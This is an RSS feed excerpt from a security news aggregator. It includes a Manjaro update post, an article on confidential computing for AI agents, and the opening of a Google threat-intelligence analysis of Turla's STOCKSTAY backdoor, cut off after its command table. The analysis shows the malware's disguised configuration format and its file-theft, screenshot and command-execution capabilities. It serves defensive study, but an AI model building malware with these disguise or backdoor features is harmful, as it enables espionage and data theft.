<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-862931-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-862931-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521/1">(click for more details)</a>
<h2><a name="p-862931-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-862931-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated
<ul>
<li>introducing <strong>linux72</strong> series</li>
</ul>
</li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v260.1...v260.2">260.2</a></li>
<li><strong>PipeWire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.6">1.6.6</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.0.16">1.0.16</a></li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/271414/">610.43.02</a></li>
<li><strong>VLC</strong> <a href="https://images.videolan.org/vlc/releases/3.0.23.html">3.0.23_2</a></li>
<li><strong>Arkdep</strong> <a href="https://github.com/arkanelinux/arkdep/compare/2025.12.18...2026.06.10">20260610</a></li>
<li><strong>Xorg-Server</strong> <a href="https://lists.x.org/archives/xorg-announce/2026-June/003702.html">21.1.23</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.2/">26.04.2</a></li>
<li><strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/frameworks/6/6.27.0/">6.27.0</a></li>
<li><strong>LibreOffice</strong> <a href="https://blog.documentfoundation.org/blog/2026/06/05/tdf-releases-libreoffice-26-2-4/">26.2.4</a></li>
<li><strong>QEmu</strong> <a href="https://www.qemu.org/2026/04/22/qemu-11-0-0/">11.0.1</a></li>
</ul>
<h2><a name="p-862931-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-862931-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.176</li>
<li>linux66 6.6.143</li>
<li>linux612 6.12.94</li>
<li>linux618 6.18.36</li>
<li>linux70 7.0.13</li>
<li>linux71 7.1.1</li>
<li>linux72 7.2.0-rc0</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (Tue Jun 16 2026 12:41:23 GMT+0000)</p>
<ul>
<li>stable core x86_64:  50 new and 49 removed package(s)</li>
<li>stable extra x86_64:  3915 new and 3839 removed package(s)</li>
<li>stable multilib x86_64:  50 new and 50 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://termbin.com/37b6">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-06-26-kernels-systemd-pipewire-nvidia-kde-libreoffice/188521">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Weekly Roundup: NY Summit recap, Local Zone in Hanoi, Grok 4.3 in Bedrock, price reductions, and more (June 22, 2026)]]></title>
<description><![CDATA[Last week AWS Summit New York City brought together thousands of customers, partners, and builders for a free, one-day event showcasing the latest in cloud and AI innovation. Dr. Swami Sivasubramanian, VP of Agentic AI at AWS unveiled a stack of AI launches in his keynote, all built around one th...]]></description>
<link>https://tsecurity.de/de/3626208/ai-nachrichten/aws-weekly-roundup-ny-summit-recap-local-zone-in-hanoi-grok-43-in-bedrock-price-reductions-and-more-june-22-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626208/ai-nachrichten/aws-weekly-roundup-ny-summit-recap-local-zone-in-hanoi-grok-43-in-bedrock-price-reductions-and-more-june-22-2026/</guid>
<pubDate>Fri, 26 Jun 2026 05:03:26 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Last week AWS Summit New York City brought together thousands of customers, partners, and builders for a free, one-day event showcasing the latest in cloud and AI innovation. Dr. Swami Sivasubramanian, VP of Agentic AI at AWS unveiled a stack of AI launches in his keynote, all built around one thesis: agents that compound value […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Wavestone ist Partner des Handelsblatt Summit Zukunft IT 2026]]></title>
<description><![CDATA[strategischem IT-Management im Zeitalter von AI; der Skalierung von Innovationen und KI-Anwendungen; digitaler Souveränität und Cybersecurity; der ...]]></description>
<link>https://tsecurity.de/de/3625392/it-security-nachrichten/wavestone-ist-partner-des-handelsblatt-summit-zukunft-it-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625392/it-security-nachrichten/wavestone-ist-partner-des-handelsblatt-summit-zukunft-it-2026/</guid>
<pubDate>Thu, 25 Jun 2026 19:06:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[strategischem <b>IT</b>-Management im Zeitalter von AI; der Skalierung von Innovationen und KI-Anwendungen; digitaler Souveränität und Cybersecurity; der ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI security steals the spotlight at Confidential Computing Summit]]></title>
<description><![CDATA[For a decade, confidential computing has been chipping away at one of security’s hardest problems: data is well encrypted in transit and at rest, but when a processor works on it, that data sits in memory in the clear, exposed to anyone with privileged host access.



“Confidential computing’s ai...]]></description>
<link>https://tsecurity.de/de/3625337/ai-nachrichten/agentic-ai-security-steals-the-spotlight-at-confidential-computing-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625337/ai-nachrichten/agentic-ai-security-steals-the-spotlight-at-confidential-computing-summit/</guid>
<pubDate>Thu, 25 Jun 2026 18:50:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For a decade, confidential computing has been chipping away at one of security’s hardest problems: data is well encrypted in transit and at rest, but when a processor works on it, that data sits in memory in the clear, exposed to anyone with privileged host access.</p>



<p>“Confidential computing’s aim was to solve this with a trusted execution environment, a subset of the CPU that runs the encrypted workload and handles things like memory encryption,” said <a href="https://www.linkedin.com/in/marina-moore-5a7242105/" data-type="link" data-id="https://www.linkedin.com/in/marina-moore-5a7242105/">Marina Moore</a>, lead security researcher at <a href="https://edera.dev/" data-type="link" data-id="https://edera.dev/">Edera</a>.</p>



<p>For years the field felt like post-quantum cryptography PhD research scientist types agreeing the work is essential, while waiting for it to reach mainstream practitioners. At the <a href="https://events.linuxfoundation.org/confidential-computing-summit/" data-type="link" data-id="https://events.linuxfoundation.org/confidential-computing-summit/">Confidential Computing Summit</a> in San Francisco this week, the breakout use case came into focus: agentic AI.</p>



<h2 class="wp-block-heading">Like the web before HTTPS</h2>



<p>“I was in the really early days of HTTP, and then HTTPS came along pretty quickly,” said <a href="https://www.linkedin.com/in/mikebursell/" data-type="link" data-id="https://www.linkedin.com/in/mikebursell/">Mike Bursell</a>, executive director of the <a href="https://confidentialcomputing.io/" data-type="link" data-id="https://confidentialcomputing.io/">Confidential Computing Consortium</a>. He sees agentic AI where the web sat before certificate authorities and public key infrastructure brokered trust online. </p>



<p>“The original agent specifications were not written by security architects,” Bursell said, and “some of it feels in need of refinement.”</p>



<p>The gap confidential computing fills is attestation, which provides proof of what runs. The hardware hashes the memory and firmware of a protected execution environment and signs the result inside the chip, Bursell explained, producing a measurement a verifier checks against the expected software. Without it, an agent session shares the early web problem of open windows for hijacking, except the attackers are now agents themselves.</p>



<p>The old objection that confidential computing demanded exotic hardware is largely gone, Bursell said, now that it ships in AMD, Intel, and NVIDIA parts and turns on with a click <a href="https://www.infoworld.com/article/2256355/what-is-azure-confidential-computing.html" data-type="link" data-id="https://www.infoworld.com/article/2256355/what-is-azure-confidential-computing.html">in Microsoft Azure</a> or Google Cloud. The goal is to make confidential computing so accessible that secure execution becomes the default assumption rather than a specialized deployment choice, and that trust alarms go off when secure execution criteria are not met, much like how a user visiting a non-HTTPS website is greeted with a warning.</p>



<h2 class="wp-block-heading">Identity and attestation move into standards</h2>



<p>Many of the working sessions at the Confidential Computing Summit, hosted by the Linux Foundation, were about turning these mechanisms into standards, following the same path internet security took through bodies such as the IETF and IEEE.</p>



<p><a href="https://www.linkedin.com/in/raghu-yeluri-17550/" data-type="link" data-id="https://www.linkedin.com/in/raghu-yeluri-17550/">Raghu Yeluri</a>, senior principal engineer at Intel, detailed a composite attestation format that Intel, Microsoft, and NVIDIA built so that attestation data can span confidential VMs, their CPUs, and GPUs, without vendor-specific formats. Yeluri said the group hopes to advance that work toward an RFC within the next year.</p>



<p>That effort runs through the Confidential Computing Consortium, the Linux Foundation community where competing companies collaborate on shared infrastructure problems. The consortium is not trying to become a registry of trusted agents, Bursell added, but rather a place where companies can develop frameworks, best practices, and, equally important, antipatterns.</p>



<p>Identity drew some of the strongest interest at this week’s event. <a href="https://www.linkedin.com/in/khpawan/" data-type="link" data-id="https://www.linkedin.com/in/khpawan/">Pawan Khandavilli</a>, senior product manager at Microsoft, pointed to agent payment initiatives from Visa, Mastercard, and Google, the FIDO Alliance’s emerging agent work, SPIFFE workload identities, and RFC 8693 token exchange. The pieces already exist, Khandavilli argued, but “the vocabulary is fragmented.” The challenge now is connecting those identity systems to hardware-backed attestation rather than relying solely on software trust.</p>



<h2 class="wp-block-heading">The attack surface below the attestation</h2>



<p>Hardware-isolated environments are only as secure as the shared substrates beneath them. <a href="https://www.linkedin.com/in/zvonkok/" data-type="link" data-id="https://www.linkedin.com/in/zvonkok/">Zvonko Kaiser</a>, principal systems engineer at NVIDIA, argued that attestation protects the trusted execution environment itself but does not eliminate risks in the shared substrates underneath. The processor cache sits below every isolation boundary, and a 2026 technique called <a href="https://tdxray.cpusec.org/#explainer" data-type="link" data-id="https://tdxray.cpusec.org/#explainer">TDXRay</a> demonstrated how information could be observed across virtual machine boundaries. No layer above the cache, Kaiser argued, can completely hide what the cache itself sees.</p>



<p>The Kubernetes control plane presents another challenge. One etcd store may hold secrets for multiple tenants, while a shared scheduler decides where workloads run. Those shared services create opportunities for compromise that sit outside the guarantees provided by confidential computing hardware. </p>



<p><a href="https://www.linkedin.com/in/antoine-delignat-lavaud-27545276/" data-type="link" data-id="https://www.linkedin.com/in/antoine-delignat-lavaud-27545276/">Antoine Delignat Lavaud</a>, principal researcher at Microsoft, highlighted another limitation. Attestation can prove that a workload runs on authentic confidential computing hardware, but “it doesn’t tell you where it is running,” leaving questions of data residency and sovereignty unresolved.</p>



<p>“Confidential computing is hardware based. If and when vulnerabilities are discovered, it’s much harder to patch those and re-establish the security,” added Edera’s Moore.</p>



<p>Microsoft’s Khandavilli outlined four major gaps that still require industry coordination: binding agent identities directly to hardware, bringing attestation into the <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> that increasingly governs tool access, establishing trusted chains when agents delegate work to other agents, and enabling trust relationships across cloud providers. Intel’s Yeluri noted that confidential computing will not solve every security problem, but it provides the foundation upon which higher-level controls can be built.</p>



<h2 class="wp-block-heading">HTTPS for the agentic era</h2>



<p>What was clear from the Confidential Computing Summit is that security for AI agents increasingly resembles the trust infrastructure that underpins today’s internet. Certificates, identity brokers, verification services, and cryptographic handshakes established trust between systems that did not know each other. Agentic AI appears headed toward the same destination. </p>



<p>For example, last month the Linux Foundation announced DNS-AID, extending domain name system concepts into agent discovery and <a href="https://www.infoworld.com/article/4189361/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents.html" data-type="link" data-id="https://www.infoworld.com/article/4189361/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents.html">introducing an Agent Name Service framework</a> for agent identity.</p>



<p>Who ultimately operates those trust services for agents is “still coming out in the wash,” said Bursell. “Regulators, governments, software vendors, cloud providers, and others may all play roles. If you can’t establish trust, you can’t understand or manage risk.” </p>



<p>Confidential computing is focused on the layer beneath those systems, creating ways to verify the environments where agents execute and the actions they perform. If that work succeeds, the trust fabric that emerges around agents may end up looking remarkably similar to the one that quietly powers the internet today. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[STOCKSTAY Another Day: The Latest Addition to Turla’s Intelligence Gathering Apparatus]]></title>
<description><![CDATA[Written by: Jordan Jones

Introduction 
Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-01...]]></description>
<link>https://tsecurity.de/de/3624817/it-security-nachrichten/stockstay-another-day-the-latest-addition-to-turlas-intelligence-gathering-apparatus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624817/it-security-nachrichten/stockstay-another-day-the-latest-addition-to-turlas-intelligence-gathering-apparatus/</guid>
<pubDate>Thu, 25 Jun 2026 16:09:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Jordan Jones</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions. </span></p>
<p><span>Turla, and specifically their longstanding Snake implant, has been publicly </span><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a" rel="noopener" target="_blank"><span>attributed</span></a><span> by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). Turla is one of the oldest known cyber espionage groups with suspected activity dating back to </span><a href="https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/" rel="noopener" target="_blank"><span>at least 2004</span></a><span>. The actor remains active and continues to evolve its delivery methods, as demonstrated by its </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/"><span>deployment of specialized scripts</span></a><span> to intercept secure communications from Signal Messenger users, its </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/turla-galaxy-opportunity/"><span>hijacking of legacy criminal botnets</span></a><span> to target Ukrainian organizations, and its </span><a href="https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/" rel="noopener" target="_blank"><span>recent campaigns</span></a><span> targeting military defense sectors using the highly sophisticated KAZUAR toolkit. As part of our continued tracking of this group, this blog post provides an overview of our STOCKSTAY analysis, includes a timeline of key developmental and operational observations, and examines its similarities to KAZUAR to contextualize this new capability within Turla’s ever-growing arsenal.</span></p>
<h3><span>STOCKSTAY Overview</span></h3>
<p><span>STOCKSTAY is a multi-component backdoor written in .NET, using the Windows Forms framework, which communicates with its command and control (C2) via a secure WebSocket connection, utilizing the open-source </span><a href="https://github.com/sta/websocket-sharp" rel="noopener" target="_blank"><span>websocket-sharp</span></a><span> library. STOCKSTAY consists of several distinct components that communicate with one another via an inter-process communication (IPC) channel, based on the exchange of </span><a href="https://learn.microsoft.com/en-us/windows/win32/dataxchg/wm-copydata" rel="noopener" target="_blank"><span>WM_COPYDATA</span></a><span> messages. </span></p>
<p><span>STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, incorporating this disguise in both its file naming scheme and its storage of implant configuration, control messages, and response data. While initial versions of the malware observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig1.max-1000x1000.png" alt="Overview of STOCKSTAY malware architecture">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="nw27v">Figure 1: Overview of STOCKSTAY malware architecture</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>STOCKSTAY.STOCKBROKER</span></h4>
<p><span>STOCKSTAY.STOCKBROKER is a proxy-aware tunneler which provides network communication capabilities to the wider STOCKSTAY ecosystem. STOCKSTAY.STOCKBROKER, internally referred to as "</span><code>net</code><span>", can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between the server and the STOCKSTAY.STOCKMARKET orchestrator. As a result, all C2 communication between STOCKSTAY and the configured C2 server are handled by STOCKSTAY.STOCKBROKER, isolating the malware’s network communications from other malicious host-based activity on the infected machine. </span></p>
<h4><span>STOCKSTAY.STOCKMARKET</span></h4>
<p><span>STOCKSTAY.STOCKMARKET, internally referred to as “</span><code>cor</code><span>”, is the orchestrator of the STOCKSTAY ecosystem, and enables the implant’s configurability. The malware’s configuration is loaded from an encrypted on-disk configuration file which specifies several options regarding the malware’s execution, including the details of the remote WebSocket server required by STOCKSTAY.STOCKBROKER. The configuration file attempts to disguise itself as a legitimate file by including various legitimate URLs associated with cryptocurrency markets, as well as falsified descriptions of each configuration field (Figure 2). Encrypted configuration data is embedded within the decoy fields, which is decrypted by STOCKSTAY.STOCKMARKET.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
  "Name": "StockMarket",
  "Description": "An application for getting information about current events on trading platforms. To set the time for updating information, enter a value in minutes in the `Interval` field. In the future, support for themes will be added. The `SystemConfiguration` field stores the system settings of the application. In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`.",
  "Theme": "Dark",
  "SystemConfiguration": [
    "1D.AA.79.9F.45.AA.04.B3.&lt;snipped&gt;.68.0A.5D.A3.E6.A3.82.FA",
    "6F.41.4D.6D.C3.20.E5.32.&lt;snipped&gt;.00.B8.26.DF.E1.13.0A.21",
    "4.4.3.12"
  ],
  "Interval": 10,
  "Services": [
    "wss://ws-api.binance.com:443/ws-api/v3",
    "wss://ws-feed.exchange.coinbase.com",
    "wss://ws-feed-public.sandbox.exchange.coinbase.com",
    "wss://stream.bybit.com/v5/public/spot",
    "wss://stream.bybit.com/v5/public/linear"
  ],
  "Version": "2022-12-21"
}</code></pre>
<p><span><span>Figure 2: Encrypted STOCKSTAY configuration file format, falsely describing itself as an application for trading information</span></span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
  "internal_id": "&lt;server_identifier&gt;",
  "internal_key": "&lt;server_public_key&gt;",
  "interval_engine": "600000",
  "level_info": "0",
  "time_scale": "1",
  "span_min": "9",
  "span_max": "18",
  "rate": "2700",
  "rate_control": "false",
  "service": "&lt;websocket_c2_url&gt;",
  "days_not_work": "Saturday;Sunday;",
  "system_properties": "eyJzeXN0ZW1fZGF0YV9zaXplIjoiNDAwMDAwIn0="
}</code></pre>
<p><span><span>Figure 3: Decrypted STOCKSTAY configuration file format (extracted from </span><code>SystemConfiguration</code><span> field)</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>STOCKSTAY.STOCKMARKET communicates with STOCKSTAY.STOCKBROKER in order to provide details of the WebSocket server, and to subsequently send and receive messages via the established WebSocket connection, usually containing the results of executed commands. STOCKSTAY.STOCKMARKET also communicates with the STOCKSTAY.STOCKTRADER component in order to issue commands to be executed on the infected host.</span></p>
<p><span>On first execution, STOCKSTAY.STOCKMARKET generates a unique 4096-bit RSA key pair, to be used throughout the implant’s lifecycle to encrypt outbound data prior to being sent via WebSocket. The implant’s public key is sent to the server in the malware’s first request, to enable the server to decrypt task responses. STOCKSTAY.STOCKMARKET also generates a unique infection identifier to be used by the C2 server to determine the intended receiver of tasking. STOCKSTAY’s configuration file specifies an </span><span>“</span><code>internal_id</code><span>” field, which GTIG assesses represents an identifier for the server-side component of the malware ecosystem. We assess that this identifier is used by the malware’s operators to retrieve responses from interim C2 servers which may be used by multiple operators. To date, GTIG has observed only a single unique value for this identifier and is unable to determine whether multiple operators are leveraging STOCKSTAY at this time due to insufficient telemetry.</span></p>
<h4><span>STOCKSTAY.STOCKTRADER</span></h4>
<p><span>STOCKSTAY.STOCKTRADER, internally referred to as “</span><code>sys</code><span>”, is the backdoor component of the STOCKSTAY ecosystem, and supports a range of registry, file, and command execution operations on the infected host, as detailed in Table 1.</span></p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><span>Task Command Name</span></p>
</th>
<th scope="col">
<p><span>Description</span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>Del</code></p>
</td>
<td>
<p><span>Delete the specified files.</span></p>
<p><span>Requires a semi-colon-separated list of file paths, each of which will be deleted. Confirmation of each deleted file, or deletion failure, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Dir</code></p>
</td>
<td>
<p><span>Generate a listing of the specified directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be enumerated with the paths of all contained files and subdirectories being returned to the C2.</span></p>
<p><span>Optionally performs recursive directory listing.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Get</code></p>
</td>
<td>
<p><span>Retrieve one or more specified files. Allows for collection of files with specific extensions.</span></p>
<p><span>Requires a semi-colon-separated list of file or directory paths, and a list of target file extensions. If a file path is included in the list, this file will be returned. If instead a directory path is included in the list, the malware will perform an optionally recursive search of the directory to identify any files matching the target file extensions. </span></p>
<p><span>All files matching either the specified file paths, or the target file extensions, will be added to an in-memory ZIP archive and subsequently base64-encoded for transmission to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Image</code></p>
</td>
<td>
<p><span>Perform a screen-capture of the victim’s screen.</span></p>
<p><span>The resultant image is base64-encoded for transmission to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>MkDir</code></p>
</td>
<td>
<p><span>Create one or more directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be created. Confirmation of each created directory, or any resultant error, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>MultyTask</code></p>
</td>
<td>
<p><span>Process multiple tasks at once.</span></p>
<p><span>Requires a semi-colon-separated list of tasks, each of which must be a serialized JSON object containing an individual task.</span></p>
<p><span>Each task is submitted to the malware’s command-manager in-turn, with all command output being discarded; no data is returned to the C2 when processing multiple tasks at once.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Put</code></p>
</td>
<td>
<p><span>Upload a file to the device.</span></p>
<p><span>Requires a base64-encoded string representation of the file content to be written to the specified filepath. The required file write operation is performed in “Append” mode.</span></p>
<p><span>Confirmation of file upload, or details of any relevant error, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegDelete</code></p>
</td>
<td>
<p><span>Delete a registry value.</span></p>
<p><span>Requires a registry key and corresponding value name to delete.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegRead</code></p>
</td>
<td>
<p><span>Read a registry value.</span></p>
<p><span>Requires a registry key and corresponding value name to read.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>RegWrite</code></p>
</td>
<td>
<p><span>Set a registry value. </span></p>
<p><span>Requires a registry key and corresponding value name, as well as the value and data type used to populate the registry value. </span></p>
</td>
</tr>
<tr>
<td>
<p><code>RmDir</code></p>
</td>
<td>
<p><span>Delete the specified directories.</span></p>
<p><span>Requires a semi-colon-separated list of directory paths, each of which will be deleted. Confirmation of each deleted directory, or deletion failure, is returned to the C2.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Run</code></p>
</td>
<td>
<p><span>Execute a new process.</span></p>
<p><span>Requires a path to the file to execute and its corresponding arguments. A default timeout of 60 seconds is hard-coded into the malware, however this can be overridden by the task configuration.</span></p>
<p><span>All subprocesses are created windowless with redirected stdout.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>Sysinfo</code></p>
</td>
<td>
<p><span>Conduct a system survey to gather key information about the infected host.</span></p>
<p><span>Operating system information is collected via the Windows Management Instrumentation (WMI) ManagementObjectSearcher, specifically the following fields:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>OSVersion</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Architecture</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SerialNumber</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CodeSet</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>CountryCode</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Locale</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>InstallDate</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>BootupTime</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MachineName</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>SystemDirectory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>LocalTime</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>AnsiCodePage</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>UserName</span></p>
</li>
</ul>
<p><span>With respect to hardware, WMI is queried for the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>ProcessorName</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>NumberCores</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>ClockSpeed</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MemoryCapacity</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>MemoryType</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DiskModel </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>DiskSize</span></p>
</li>
</ul>
<p><span>The malware also captures a list of the names of running processes.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>UnpackArchive</code></p>
</td>
<td>
<p><span>Extract the specified ZIP file to its current directory.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
